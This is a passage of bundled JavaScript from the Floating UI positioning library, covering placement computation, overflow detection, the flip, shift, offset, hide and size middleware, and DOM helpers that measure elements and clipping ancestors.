    } = _ref;
    const sideAxis = getSideAxis(placement);
    const alignmentAxis = getAlignmentAxis(placement);
    const alignLength = getAxisLength(alignmentAxis);
    const side = getSide(placement);
    const isVertical = sideAxis === "y";
    const commonX = reference.x + reference.width / 2 - floating.width / 2;
    const commonY = reference.y + reference.height / 2 - floating.height / 2;
    const commonAlign = reference[alignLength] / 2 - floating[alignLength] / 2;
    let coords;
    switch (side) {
      case "top":
        coords = {
          x: commonX,
          y: reference.y - floating.height
        };
        break;
      case "bottom":
        coords = {
          x: commonX,
          y: reference.y + reference.height
        };
        break;
      case "right":
        coords = {
          x: reference.x + reference.width,
          y: commonY
        };
        break;
      case "left":
        coords = {
          x: reference.x - floating.width,
          y: commonY
        };
        break;
      default:
        coords = {
          x: reference.x,
          y: reference.y
        };
    }
    switch (getAlignment(placement)) {
      case "start":
        coords[alignmentAxis] -= commonAlign * (rtl && isVertical ? -1 : 1);
        break;
      case "end":
        coords[alignmentAxis] += commonAlign * (rtl && isVertical ? -1 : 1);
        break;
    }
    return coords;
  }
  async function detectOverflow(state, options) {
    var _await$platform$isEle;
    if (options === void 0) {
      options = {};
    }
    const {
      x,
      y,
      platform: platform3,
      rects,
      elements,
      strategy
    } = state;
    const {
      boundary = "clippingAncestors",
      rootBoundary = "viewport",
      elementContext = "floating",
      altBoundary = false,
      padding = 0
    } = evaluate(options, state);
    const paddingObject = getPaddingObject(padding);
    const altContext = elementContext === "floating" ? "reference" : "floating";
    const element = elements[altBoundary ? altContext : elementContext];
    const clippingClientRect = rectToClientRect(await platform3.getClippingRect({
      element: ((_await$platform$isEle = await (platform3.isElement == null ? void 0 : platform3.isElement(element))) != null ? _await$platform$isEle : true) ? element : element.contextElement || await (platform3.getDocumentElement == null ? void 0 : platform3.getDocumentElement(elements.floating)),
      boundary,
      rootBoundary,
      strategy
    }));
    const rect = elementContext === "floating" ? {
      x,
      y,
      width: rects.floating.width,
      height: rects.floating.height
    } : rects.reference;
    const offsetParent = await (platform3.getOffsetParent == null ? void 0 : platform3.getOffsetParent(elements.floating));
    const offsetScale = await (platform3.isElement == null ? void 0 : platform3.isElement(offsetParent)) ? await (platform3.getScale == null ? void 0 : platform3.getScale(offsetParent)) || {
      x: 1,
      y: 1
    } : {
      x: 1,
      y: 1
    };
    const elementClientRect = rectToClientRect(platform3.convertOffsetParentRelativeRectToViewportRelativeRect ? await platform3.convertOffsetParentRelativeRectToViewportRelativeRect({
      elements,
      rect,
      offsetParent,
      strategy
    }) : rect);
    return {
      top: (clippingClientRect.top - elementClientRect.top + paddingObject.top) / offsetScale.y,
      bottom: (elementClientRect.bottom - clippingClientRect.bottom + paddingObject.bottom) / offsetScale.y,
      left: (clippingClientRect.left - elementClientRect.left + paddingObject.left) / offsetScale.x,
      right: (elementClientRect.right - clippingClientRect.right + paddingObject.right) / offsetScale.x
    };
  }
  var MAX_RESET_COUNT = 50;
  var computePosition = async (reference, floating, config) => {
    const {
      placement = "bottom",
      strategy = "absolute",
      middleware = [],
      platform: platform3
    } = config;
    const platformWithDetectOverflow = platform3.detectOverflow ? platform3 : {
      ...platform3,
      detectOverflow
    };
    const rtl = await (platform3.isRTL == null ? void 0 : platform3.isRTL(floating));
    let rects = await platform3.getElementRects({
      reference,
      floating,
      strategy
    });
    let {
      x,
      y
    } = computeCoordsFromPlacement(rects, placement, rtl);
    let statefulPlacement = placement;
    let resetCount = 0;
    const middlewareData = {};
    for (let i = 0; i < middleware.length; i++) {
      const currentMiddleware = middleware[i];
      if (!currentMiddleware) {
        continue;
      }
      const {
        name,
        fn
      } = currentMiddleware;
      const {
        x: nextX,
        y: nextY,
        data,
        reset
      } = await fn({
        x,
        y,
        initialPlacement: placement,
        placement: statefulPlacement,
        strategy,
        middlewareData,
        rects,
        platform: platformWithDetectOverflow,
        elements: {
          reference,
          floating
        }
      });
      x = nextX != null ? nextX : x;
      y = nextY != null ? nextY : y;
      middlewareData[name] = {
        ...middlewareData[name],
        ...data
      };
      if (reset && resetCount < MAX_RESET_COUNT) {
        resetCount++;
        if (typeof reset === "object") {
          if (reset.placement) {
            statefulPlacement = reset.placement;
          }
          if (reset.rects) {
            rects = reset.rects === true ? await platform3.getElementRects({
              reference,
              floating,
              strategy
            }) : reset.rects;
          }
          ({
            x,
            y
          } = computeCoordsFromPlacement(rects, statefulPlacement, rtl));
        }
        i = -1;
      }
    }
    return {
      x,
      y,
      placement: statefulPlacement,
      strategy,
      middlewareData
    };
  };
  var flip = function(options) {
    if (options === void 0) {
      options = {};
    }
    return {
      name: "flip",
      options,
      async fn(state) {
        var _middlewareData$arrow, _middlewareData$flip;
        const {
          placement,
          middlewareData,
          rects,
          initialPlacement,
          platform: platform3,
          elements
        } = state;
        const {
          mainAxis: checkMainAxis = true,
          crossAxis: checkCrossAxis = true,
          fallbackPlacements: specifiedFallbackPlacements,
          fallbackStrategy = "bestFit",
          fallbackAxisSideDirection = "none",
          flipAlignment = true,
          ...detectOverflowOptions
        } = evaluate(options, state);
        if ((_middlewareData$arrow = middlewareData.arrow) != null && _middlewareData$arrow.alignmentOffset) {
          return {};
        }
        const side = getSide(placement);
        const initialSideAxis = getSideAxis(initialPlacement);
        const isBasePlacement = getSide(initialPlacement) === initialPlacement;
        const rtl = await (platform3.isRTL == null ? void 0 : platform3.isRTL(elements.floating));
        const fallbackPlacements = specifiedFallbackPlacements || (isBasePlacement || !flipAlignment ? [getOppositePlacement(initialPlacement)] : getExpandedPlacements(initialPlacement));
        const hasFallbackAxisSideDirection = fallbackAxisSideDirection !== "none";
        if (!specifiedFallbackPlacements && hasFallbackAxisSideDirection) {
          fallbackPlacements.push(...getOppositeAxisPlacements(initialPlacement, flipAlignment, fallbackAxisSideDirection, rtl));
        }
        const placements2 = [initialPlacement, ...fallbackPlacements];
        const overflow = await platform3.detectOverflow(state, detectOverflowOptions);
        const overflows = [];
        let overflowsData = ((_middlewareData$flip = middlewareData.flip) == null ? void 0 : _middlewareData$flip.overflows) || [];
        if (checkMainAxis) {
          overflows.push(overflow[side]);
        }
        if (checkCrossAxis) {
          const sides2 = getAlignmentSides(placement, rects, rtl);
          overflows.push(overflow[sides2[0]], overflow[sides2[1]]);
        }
        overflowsData = [...overflowsData, {
          placement,
          overflows
        }];
        if (!overflows.every((side2) => side2 <= 0)) {
          var _middlewareData$flip2, _overflowsData$filter;
          const nextIndex = (((_middlewareData$flip2 = middlewareData.flip) == null ? void 0 : _middlewareData$flip2.index) || 0) + 1;
          const nextPlacement = placements2[nextIndex];
          if (nextPlacement) {
            const ignoreCrossAxisOverflow = checkCrossAxis === "alignment" ? initialSideAxis !== getSideAxis(nextPlacement) : false;
            if (!ignoreCrossAxisOverflow || // We leave the current main axis only if every placement on that axis
            // overflows the main axis.
            overflowsData.every((d) => getSideAxis(d.placement) === initialSideAxis ? d.overflows[0] > 0 : true)) {
              return {
                data: {
                  index: nextIndex,
                  overflows: overflowsData
                },
                reset: {
                  placement: nextPlacement
                }
              };
            }
          }
          let resetPlacement = (_overflowsData$filter = overflowsData.filter((d) => d.overflows[0] <= 0).sort((a, b) => a.overflows[1] - b.overflows[1])[0]) == null ? void 0 : _overflowsData$filter.placement;
          if (!resetPlacement) {
            switch (fallbackStrategy) {
              case "bestFit": {
                var _overflowsData$filter2;
                const placement2 = (_overflowsData$filter2 = overflowsData.filter((d) => {
                  if (hasFallbackAxisSideDirection) {
                    const currentSideAxis = getSideAxis(d.placement);
                    return currentSideAxis === initialSideAxis || // Create a bias to the `y` side axis due to horizontal
                    // reading directions favoring greater width.
                    currentSideAxis === "y";
                  }
                  return true;
                }).map((d) => [d.placement, d.overflows.filter((overflow2) => overflow2 > 0).reduce((acc, overflow2) => acc + overflow2, 0)]).sort((a, b) => a[1] - b[1])[0]) == null ? void 0 : _overflowsData$filter2[0];
                if (placement2) {
                  resetPlacement = placement2;
                }
                break;
              }
              case "initialPlacement":
                resetPlacement = initialPlacement;
                break;
            }
          }
          if (placement !== resetPlacement) {
            return {
              reset: {
                placement: resetPlacement
              }
            };
          }
        }
        return {};
      }
    };
  };
  function getSideOffsets(overflow, rect) {
    return {
      top: overflow.top - rect.height,
      right: overflow.right - rect.width,
      bottom: overflow.bottom - rect.height,
      left: overflow.left - rect.width
    };
  }
  function isAnySideFullyClipped(overflow) {
    return sides.some((side) => overflow[side] >= 0);
  }
  var hide = function(options) {
    if (options === void 0) {
      options = {};
    }
    return {
      name: "hide",
      options,
      async fn(state) {
        const {
          rects,
          platform: platform3
        } = state;
        const {
          strategy = "referenceHidden",
          ...detectOverflowOptions
        } = evaluate(options, state);
        switch (strategy) {
          case "referenceHidden": {
            const overflow = await platform3.detectOverflow(state, {
              ...detectOverflowOptions,
              elementContext: "reference"
            });
            const offsets = getSideOffsets(overflow, rects.reference);
            return {
              data: {
                referenceHiddenOffsets: offsets,
                referenceHidden: isAnySideFullyClipped(offsets)
              }
            };
          }
          case "escaped": {
            const overflow = await platform3.detectOverflow(state, {
              ...detectOverflowOptions,
              altBoundary: true
            });
            const offsets = getSideOffsets(overflow, rects.floating);
            return {
              data: {
                escapedOffsets: offsets,
                escaped: isAnySideFullyClipped(offsets)
              }
            };
          }
          default: {
            return {};
          }
        }
      }
    };
  };
  var originSides = /* @__PURE__ */ new Set(["left", "top"]);
  async function convertValueToCoords(state, options) {
    const {
      placement,
      platform: platform3,
      elements
    } = state;
    const rtl = await (platform3.isRTL == null ? void 0 : platform3.isRTL(elements.floating));
    const side = getSide(placement);
    const alignment = getAlignment(placement);
    const isVertical = getSideAxis(placement) === "y";
    const mainAxisMulti = originSides.has(side) ? -1 : 1;
    const crossAxisMulti = rtl && isVertical ? -1 : 1;
    const rawValue = evaluate(options, state);
    let {
      mainAxis,
      crossAxis,
      alignmentAxis
    } = typeof rawValue === "number" ? {
      mainAxis: rawValue,
      crossAxis: 0,
      alignmentAxis: null
    } : {
      mainAxis: rawValue.mainAxis || 0,
      crossAxis: rawValue.crossAxis || 0,
      alignmentAxis: rawValue.alignmentAxis
    };
    if (alignment && typeof alignmentAxis === "number") {
      crossAxis = alignment === "end" ? alignmentAxis * -1 : alignmentAxis;
    }
    return isVertical ? {
      x: crossAxis * crossAxisMulti,
      y: mainAxis * mainAxisMulti
    } : {
      x: mainAxis * mainAxisMulti,
      y: crossAxis * crossAxisMulti
    };
  }
  var offset = function(options) {
    if (options === void 0) {
      options = 0;
    }
    return {
      name: "offset",
      options,
      async fn(state) {
        var _middlewareData$offse, _middlewareData$arrow;
        const {
          x,
          y,
          placement,
          middlewareData
        } = state;
        const diffCoords = await convertValueToCoords(state, options);
        if (placement === ((_middlewareData$offse = middlewareData.offset) == null ? void 0 : _middlewareData$offse.placement) && (_middlewareData$arrow = middlewareData.arrow) != null && _middlewareData$arrow.alignmentOffset) {
          return {};
        }
        return {
          x: x + diffCoords.x,
          y: y + diffCoords.y,
          data: {
            ...diffCoords,
            placement
          }
        };
      }
    };
  };
  var shift = function(options) {
    if (options === void 0) {
      options = {};
    }
    return {
      name: "shift",
      options,
      async fn(state) {
        const {
          x,
          y,
          placement,
          platform: platform3
        } = state;
        const {
          mainAxis: checkMainAxis = true,
          crossAxis: checkCrossAxis = false,
          limiter = {
            fn: (_ref) => {
              let {
                x: x2,
                y: y2
              } = _ref;
              return {
                x: x2,
                y: y2
              };
            }
          },
          ...detectOverflowOptions
        } = evaluate(options, state);
        const coords = {
          x,
          y
        };
        const overflow = await platform3.detectOverflow(state, detectOverflowOptions);
        const crossAxis = getSideAxis(getSide(placement));
        const mainAxis = getOppositeAxis(crossAxis);
        let mainAxisCoord = coords[mainAxis];
        let crossAxisCoord = coords[crossAxis];
        if (checkMainAxis) {
          const minSide = mainAxis === "y" ? "top" : "left";
          const maxSide = mainAxis === "y" ? "bottom" : "right";
          const min2 = mainAxisCoord + overflow[minSide];
          const max2 = mainAxisCoord - overflow[maxSide];
          mainAxisCoord = clamp(min2, mainAxisCoord, max2);
        }
        if (checkCrossAxis) {
          const minSide = crossAxis === "y" ? "top" : "left";
          const maxSide = crossAxis === "y" ? "bottom" : "right";
          const min2 = crossAxisCoord + overflow[minSide];
          const max2 = crossAxisCoord - overflow[maxSide];
          crossAxisCoord = clamp(min2, crossAxisCoord, max2);
        }
        const limitedCoords = limiter.fn({
          ...state,
          [mainAxis]: mainAxisCoord,
          [crossAxis]: crossAxisCoord
        });
        return {
          ...limitedCoords,
          data: {
            x: limitedCoords.x - x,
            y: limitedCoords.y - y,
            enabled: {
              [mainAxis]: checkMainAxis,
              [crossAxis]: checkCrossAxis
            }
          }
        };
      }
    };
  };
  var limitShift = function(options) {
    if (options === void 0) {
      options = {};
    }
    return {
      options,
      fn(state) {
        const {
          x,
          y,
          placement,
          rects,
          middlewareData
        } = state;
        const {
          offset: offset4 = 0,
          mainAxis: checkMainAxis = true,
          crossAxis: checkCrossAxis = true
        } = evaluate(options, state);
        const coords = {
          x,
          y
        };
        const crossAxis = getSideAxis(placement);
        const mainAxis = getOppositeAxis(crossAxis);
        let mainAxisCoord = coords[mainAxis];
        let crossAxisCoord = coords[crossAxis];
        const rawOffset = evaluate(offset4, state);
        const computedOffset = typeof rawOffset === "number" ? {
          mainAxis: rawOffset,
          crossAxis: 0
        } : {
          mainAxis: 0,
          crossAxis: 0,
          ...rawOffset
        };
        if (checkMainAxis) {
          const len = mainAxis === "y" ? "height" : "width";
          const limitMin = rects.reference[mainAxis] - rects.floating[len] + computedOffset.mainAxis;
          const limitMax = rects.reference[mainAxis] + rects.reference[len] - computedOffset.mainAxis;
          if (mainAxisCoord < limitMin) {
            mainAxisCoord = limitMin;
          } else if (mainAxisCoord > limitMax) {
            mainAxisCoord = limitMax;
          }
        }
        if (checkCrossAxis) {
          var _middlewareData$offse, _middlewareData$offse2;
          const len = mainAxis === "y" ? "width" : "height";
          const isOriginSide = originSides.has(getSide(placement));
          const limitMin = rects.reference[crossAxis] - rects.floating[len] + (isOriginSide ? ((_middlewareData$offse = middlewareData.offset) == null ? void 0 : _middlewareData$offse[crossAxis]) || 0 : 0) + (isOriginSide ? 0 : computedOffset.crossAxis);
          const limitMax = rects.reference[crossAxis] + rects.reference[len] + (isOriginSide ? 0 : ((_middlewareData$offse2 = middlewareData.offset) == null ? void 0 : _middlewareData$offse2[crossAxis]) || 0) - (isOriginSide ? computedOffset.crossAxis : 0);
          if (crossAxisCoord < limitMin) {
            crossAxisCoord = limitMin;
          } else if (crossAxisCoord > limitMax) {
            crossAxisCoord = limitMax;
          }
        }
        return {
          [mainAxis]: mainAxisCoord,
          [crossAxis]: crossAxisCoord
        };
      }
    };
  };
  var size = function(options) {
    if (options === void 0) {
      options = {};
    }
    return {
      name: "size",
      options,
      async fn(state) {
        var _state$middlewareData, _state$middlewareData2;
        const {
          placement,
          rects,
          platform: platform3,
          elements
        } = state;
        const {
          apply = () => {
          },
          ...detectOverflowOptions
        } = evaluate(options, state);
        const overflow = await platform3.detectOverflow(state, detectOverflowOptions);
        const side = getSide(placement);
        const alignment = getAlignment(placement);
        const isYAxis = getSideAxis(placement) === "y";
        const {
          width,
          height
        } = rects.floating;
        let heightSide;
        let widthSide;
        if (side === "top" || side === "bottom") {
          heightSide = side;
          widthSide = alignment === (await (platform3.isRTL == null ? void 0 : platform3.isRTL(elements.floating)) ? "start" : "end") ? "left" : "right";
        } else {
          widthSide = side;
          heightSide = alignment === "end" ? "top" : "bottom";
        }
        const maximumClippingHeight = height - overflow.top - overflow.bottom;
        const maximumClippingWidth = width - overflow.left - overflow.right;
        const overflowAvailableHeight = min(height - overflow[heightSide], maximumClippingHeight);
        const overflowAvailableWidth = min(width - overflow[widthSide], maximumClippingWidth);
        const noShift = !state.middlewareData.shift;
        let availableHeight = overflowAvailableHeight;
        let availableWidth = overflowAvailableWidth;
        if ((_state$middlewareData = state.middlewareData.shift) != null && _state$middlewareData.enabled.x) {
          availableWidth = maximumClippingWidth;
        }
        if ((_state$middlewareData2 = state.middlewareData.shift) != null && _state$middlewareData2.enabled.y) {
          availableHeight = maximumClippingHeight;
        }
        if (noShift && !alignment) {
          const xMin = max(overflow.left, 0);
          const xMax = max(overflow.right, 0);
          const yMin = max(overflow.top, 0);
          const yMax = max(overflow.bottom, 0);
          if (isYAxis) {
            availableWidth = width - 2 * (xMin !== 0 || xMax !== 0 ? xMin + xMax : max(overflow.left, overflow.right));
          } else {
            availableHeight = height - 2 * (yMin !== 0 || yMax !== 0 ? yMin + yMax : max(overflow.top, overflow.bottom));
          }
        }
        await apply({
          ...state,
          availableWidth,
          availableHeight
        });
        const nextDimensions = await platform3.getDimensions(elements.floating);
        if (width !== nextDimensions.width || height !== nextDimensions.height) {
          return {
            reset: {
              rects: true
            }
          };
        }
        return {};
      }
    };
  };

  // node_modules/@floating-ui/dom/dist/floating-ui.dom.mjs
  function getCssDimensions(element) {
    const css = getComputedStyle2(element);
    let width = parseFloat(css.width) || 0;
    let height = parseFloat(css.height) || 0;
    const hasOffset = isHTMLElement(element);
    const offsetWidth = hasOffset ? element.offsetWidth : width;
    const offsetHeight = hasOffset ? element.offsetHeight : height;
    const shouldFallback = round(width) !== offsetWidth || round(height) !== offsetHeight;
    if (shouldFallback) {
      width = offsetWidth;
      height = offsetHeight;
    }
    return {
      width,
      height,
      $: shouldFallback
    };
  }
  function unwrapElement(element) {
    return !isElement(element) ? element.contextElement : element;
  }
  function getScale(element) {
    const domElement = unwrapElement(element);
    if (!isHTMLElement(domElement)) {
      return createCoords(1);
    }
    const rect = domElement.getBoundingClientRect();
    const {
      width,
      height,
      $
    } = getCssDimensions(domElement);
    let x = ($ ? round(rect.width) : rect.width) / width;
    let y = ($ ? round(rect.height) : rect.height) / height;
    if (!x || !Number.isFinite(x)) {
      x = 1;
    }
    if (!y || !Number.isFinite(y)) {
      y = 1;
    }
    return {
      x,
      y
    };
  }
  var noOffsets = /* @__PURE__ */ createCoords(0);
  function getVisualOffsets(element) {
    const win = getWindow(element);
    if (!isWebKit() || !win.visualViewport) {
      return noOffsets;
    }
    return {
      x: win.visualViewport.offsetLeft,
      y: win.visualViewport.offsetTop
    };
  }
  function shouldAddVisualOffsets(element, isFixed, floatingOffsetParent) {
    if (isFixed === void 0) {
      isFixed = false;
    }
    if (!floatingOffsetParent || isFixed && floatingOffsetParent !== getWindow(element)) {
      return false;
    }
    return isFixed;
  }
  function getBoundingClientRect(element, includeScale, isFixedStrategy, offsetParent) {
    if (includeScale === void 0) {
      includeScale = false;
    }
    if (isFixedStrategy === void 0) {
      isFixedStrategy = false;
    }
    const clientRect = element.getBoundingClientRect();
    const domElement = unwrapElement(element);
    let scale = createCoords(1);
    if (includeScale) {
      if (offsetParent) {
        if (isElement(offsetParent)) {
          scale = getScale(offsetParent);
        }
      } else {
        scale = getScale(element);
      }
    }
    const visualOffsets = shouldAddVisualOffsets(domElement, isFixedStrategy, offsetParent) ? getVisualOffsets(domElement) : createCoords(0);
    let x = (clientRect.left + visualOffsets.x) / scale.x;
    let y = (clientRect.top + visualOffsets.y) / scale.y;
    let width = clientRect.width / scale.x;
    let height = clientRect.height / scale.y;
    if (domElement) {
      const win = getWindow(domElement);
      const offsetWin = offsetParent && isElement(offsetParent) ? getWindow(offsetParent) : offsetParent;
      let currentWin = win;
      let currentIFrame = getFrameElement(currentWin);
      while (currentIFrame && offsetParent && offsetWin !== currentWin) {
        const iframeScale = getScale(currentIFrame);
        const iframeRect = currentIFrame.getBoundingClientRect();
        const css = getComputedStyle2(currentIFrame);
        const left = iframeRect.left + (currentIFrame.clientLeft + parseFloat(css.paddingLeft)) * iframeScale.x;
        const top = iframeRect.top + (currentIFrame.clientTop + parseFloat(css.paddingTop)) * iframeScale.y;
        x *= iframeScale.x;
        y *= iframeScale.y;
        width *= iframeScale.x;
        height *= iframeScale.y;
        x += left;
        y += top;
        currentWin = getWindow(currentIFrame);
        currentIFrame = getFrameElement(currentWin);
      }
    }
    return rectToClientRect({
      width,
      height,
      x,
      y
    });
  }
  function getWindowScrollBarX(element, rect) {
    const leftScroll = getNodeScroll(element).scrollLeft;
    if (!rect) {
      return getBoundingClientRect(getDocumentElement(element)).left + leftScroll;
    }
    return rect.left + leftScroll;
  }
  function getHTMLOffset(documentElement, scroll) {
    const htmlRect = documentElement.getBoundingClientRect();
    const x = htmlRect.left + scroll.scrollLeft - getWindowScrollBarX(documentElement, htmlRect);
    const y = htmlRect.top + scroll.scrollTop;
    return {
      x,
      y
    };
  }
  function convertOffsetParentRelativeRectToViewportRelativeRect(_ref) {
    let {
      elements,
      rect,
      offsetParent,
      strategy
    } = _ref;
    const isFixed = strategy === "fixed";
    const documentElement = getDocumentElement(offsetParent);
    const topLayer = elements ? isTopLayer(elements.floating) : false;
    if (offsetParent === documentElement || topLayer && isFixed) {
      return rect;
    }
    let scroll = {
      scrollLeft: 0,
      scrollTop: 0
    };
    let scale = createCoords(1);
    const offsets = createCoords(0);
    const isOffsetParentAnElement = isHTMLElement(offsetParent);
    if (isOffsetParentAnElement || !isOffsetParentAnElement && !isFixed) {
      if (getNodeName(offsetParent) !== "body" || isOverflowElement(documentElement)) {
        scroll = getNodeScroll(offsetParent);
      }
      if (isOffsetParentAnElement) {
        const offsetRect = getBoundingClientRect(offsetParent);
        scale = getScale(offsetParent);
        offsets.x = offsetRect.x + offsetParent.clientLeft;
        offsets.y = offsetRect.y + offsetParent.clientTop;
      }
    }
    const htmlOffset = documentElement && !isOffsetParentAnElement && !isFixed ? getHTMLOffset(documentElement, scroll) : createCoords(0);
    return {
      width: rect.width * scale.x,
      height: rect.height * scale.y,
      x: rect.x * scale.x - scroll.scrollLeft * scale.x + offsets.x + htmlOffset.x,
      y: rect.y * scale.y - scroll.scrollTop * scale.y + offsets.y + htmlOffset.y
    };
  }
  function getClientRects(element) {
    return Array.from(element.getClientRects());
  }
  function getDocumentRect(element) {
    const html = getDocumentElement(element);
    const scroll = getNodeScroll(element);
    const body = element.ownerDocument.body;
    const width = max(html.scrollWidth, html.clientWidth, body.scrollWidth, body.clientWidth);
    const height = max(html.scrollHeight, html.clientHeight, body.scrollHeight, body.clientHeight);
    let x = -scroll.scrollLeft + getWindowScrollBarX(element);
    const y = -scroll.scrollTop;
    if (getComputedStyle2(body).direction === "rtl") {
      x += max(html.clientWidth, body.clientWidth) - width;
    }
    return {
      width,
      height,
      x,
      y
    };
  }
  var SCROLLBAR_MAX = 25;
  function getViewportRect(element, strategy) {
    const win = getWindow(element);
    const html = getDocumentElement(element);
    const visualViewport = win.visualViewport;
    let width = html.clientWidth;
    let height = html.clientHeight;
    let x = 0;
    let y = 0;
    if (visualViewport) {
      width = visualViewport.width;
      height = visualViewport.height;
      const visualViewportBased = isWebKit();
      if (!visualViewportBased || visualViewportBased && strategy === "fixed") {
        x = visualViewport.offsetLeft;
        y = visualViewport.offsetTop;
      }
    }
    const windowScrollbarX = getWindowScrollBarX(html);
    if (windowScrollbarX <= 0) {
      const doc = html.ownerDocument;
      const body = doc.body;
      const bodyStyles = getComputedStyle(body);
      const bodyMarginInline = doc.compatMode === "CSS1Compat" ? parseFloat(bodyStyles.marginLeft) + parseFloat(bodyStyles.marginRight) || 0 : 0;
      const clippingStableScrollbarWidth = Math.abs(html.clientWidth - body.clientWidth - bodyMarginInline);
      if (clippingStableScrollbarWidth <= SCROLLBAR_MAX) {
        width -= clippingStableScrollbarWidth;
      }
    } else if (windowScrollbarX <= SCROLLBAR_MAX) {
      width += windowScrollbarX;
    }
    return {
      width,
      height,
      x,
      y
    };
  }
  function getInnerBoundingClientRect(element, strategy) {
    const clientRect = getBoundingClientRect(element, true, strategy === "fixed");
    const top = clientRect.top + element.clientTop;
    const left = clientRect.left + element.clientLeft;
    const scale = isHTMLElement(element) ? getScale(element) : createCoords(1);
    const width = element.clientWidth * scale.x;
    const height = element.clientHeight * scale.y;
    const x = left * scale.x;
    const y = top * scale.y;
    return {
      width,
      height,
      x,
      y
    };
  }
  function getClientRectFromClippingAncestor(element, clippingAncestor, strategy) {
    let rect;
    if (clippingAncestor === "viewport") {
      rect = getViewportRect(element, strategy);
    } else if (clippingAncestor === "document") {
      rect = getDocumentRect(getDocumentElement(element));
    } else if (isElement(clippingAncestor)) {
      rect = getInnerBoundingClientRect(clippingAncestor, strategy);
    } else {
      const visualOffsets = getVisualOffsets(element);
      rect = {
        x: clippingAncestor.x - visualOffsets.x,
        y: clippingAncestor.y - visualOffsets.y,
        width: clippingAncestor.width,
        height: clippingAncestor.height
      };
    }
    return rectToClientRect(rect);
  }
  function hasFixedPositionAncestor(element, stopNode) {
    const parentNode = getParentNode(element);
    if (parentNode === stopNode || !isElement(parentNode) || isLastTraversableNode(parentNode)) {
      return false;
    }
    return getComputedStyle2(parentNode).position === "fixed" || hasFixedPositionAncestor(parentNode, stopNode);
  }
  function getClippingElementAncestors(element, cache) {
    const cachedResult = cache.get(element);
    if (cachedResult) {
      return cachedResult;
    }
    let result = getOverflowAncestors(element, [], false).filter((el) => isElement(el) && getNodeName(el) !== "body");
    let currentContainingBlockComputedStyle = null;
    const elementIsFixed = getComputedStyle2(element).position === "fixed";
    let currentNode = elementIsFixed ? getParentNode(element) : element;
    while (isElement(currentNode) && !isLastTraversableNode(currentNode)) {
      const computedStyle = getComputedStyle2(currentNode);
      const currentNodeIsContaining = isContainingBlock(currentNode);
      if (!currentNodeIsContaining && computedStyle.position === "fixed") {
        currentContainingBlockComputedStyle = null;
      }
      const shouldDropCurrentNode = elementIsFixed ? !currentNodeIsContaining && !currentContainingBlockComputedStyle : !currentNodeIsContaining && computedStyle.position === "static" && !!currentContainingBlockComputedStyle && (currentContainingBlockComputedStyle.position === "absolute" || currentContainingBlockComputedStyle.position === "fixed") || isOverflowElement(currentNode) && !currentNodeIsContaining && hasFixedPositionAncestor(element, currentNode);
      if (shouldDropCurrentNode) {
        result = result.filter((ancestor) => ancestor !== currentNode);
      } else {
        currentContainingBlockComputedStyle = computedStyle;
      }
      currentNode = getParentNode(currentNode);
    }
    cache.set(element, result);
    return result;
  }
  function getClippingRect(_ref) {
    let {
      element,
      boundary,
      rootBoundary,
      strategy
    } = _ref;
    const elementClippingAncestors = boundary === "clippingAncestors" ? isTopLayer(element) ? [] : getClippingElementAncestors(element, this._c) : [].concat(boundary);
    const clippingAncestors = [...elementClippingAncestors, rootBoundary];
    const firstRect = getClientRectFromClippingAncestor(element, clippingAncestors[0], strategy);
    let top = firstRect.top;
    let right = firstRect.right;
    let bottom = firstRect.bottom;
    let left = firstRect.left;
    for (let i = 1; i < clippingAncestors.length; i++) {
      const rect = getClientRectFromClippingAncestor(element, clippingAncestors[i], strategy);
      top = max(rect.top, top);
      right = min(rect.right, right);
      bottom = min(rect.bottom, bottom);
      left = max(rect.left, left);
    }
    return {
      width: right - left,
      height: bottom - top,
      x: left,
      y: top
    };
  }
  function getDimensions(element) {
    const {
      width,
      height
    } = getCssDimensions(element);
    return {
      width,
      height
    };
  }
  function getRectRelativeToOffsetParent(element, offsetParent, strategy) {
    const isOffsetParentAnElement = isHTMLElement(offsetParent);
    const documentElement = getDocumentElement(offsetParent);
    const isFixed = strategy === "fixed";
    const rect = getBoundingClientRect(element, true, isFixed, offsetParent);
    let scroll = {
      scrollLeft: 0,
      scrollTop: 0
    };
    const offsets = createCoords(0);
    function setLeftRTLScrollbarOffset() {
      offsets.x = getWindowScrollBarX(documentElement);
    }
    if (isOffsetParentAnElement || !isOffsetParentAnElement && !isFixed) {
      if (getNodeName(offsetParent) !== "body" || isOverflowElement(documentElement)) {
        scroll = getNodeScroll(offsetParent);
      }
      if (isOffsetParentAnElement) {
        const offsetRect = getBoundingClientRect(offsetParent, true, isFixed, offsetParent);
        offsets.x = offsetRect.x + offsetParent.clientLeft;
        offsets.y = offsetRect.y + offsetParent.clientTop;
      } else if (documentElement) {
        setLeftRTLScrollbarOffset();
      }
    }
    if (isFixed && !isOffsetParentAnElement && documentElement) {
      setLeftRTLScrollbarOffset();
    }
    const htmlOffset = documentElement && !isOffsetParentAnElement && !isFixed ? getHTMLOffset(documentElement, scroll) : createCoords(0);
    const x = rect.left + scroll.scrollLeft - offsets.x - htmlOffset.x;
    const y = rect.top + scroll.scrollTop - offsets.y - htmlOffset.y;
    return {
      x,
      y,
      width: rect.width,
      height: rect.height
    };
  }
  function isStaticPositioned(element) {
    return getComputedStyle2(element).position === "static";
  }
  function getTrueOffsetParent(element, polyfill) {
    if (!isHTMLElement(element) || getComputedStyle2(element).position === "fixed") {
      return null;
    }
    if (polyfill) {
      return polyfill(element);
    }
    let rawOffsetParent = element.offsetParent;
    if (getDocumentElement(element) === rawOffsetParent) {
      rawOffsetParent = rawOffsetParent.ownerDocument.body;
    }
    return rawOffsetParent;
  }
  function getOffsetParent(element, polyfill) {
    const win = getWindow(element);
    if (isTopLayer(element)) {
      return win;
    }
    if (!isHTMLElement(element)) {
      let svgOffsetParent = getParentNode(element);
      while (svgOffsetParent && !isLastTraversableNode(svgOffsetParent)) {
        if (isElement(svgOffsetParent) && !isStaticPositioned(svgOffsetParent)) {
          return svgOffsetParent;
        }
        svgOffsetParent = getParentNode(svgOffsetParent);
      }
      return win;
    }
    let offsetParent = getTrueOffsetParent(element, polyfill);
    while (offsetParent && isTableElement(offsetParent) && isStaticPositioned(offsetParent)) {
      offsetParent = getTrueOffsetParent(offsetParent, polyfill);
    }
    if (offsetParent && isLastTraversableNode(offsetParent) && isStaticPositioned(offsetParent) && !isContainingBlock(offsetParent)) {
      return win;
    }
    return offsetParent || getContainingBlock(element) || win;
  }
  var getElementRects = async function(data) {
    const getOffsetParentFn = this.getOffsetParent || getOffsetParent;
    const getDimensionsFn = this.getDimensions;
    const floatingDimensions = await getDimensionsFn(data.floating);
    return {
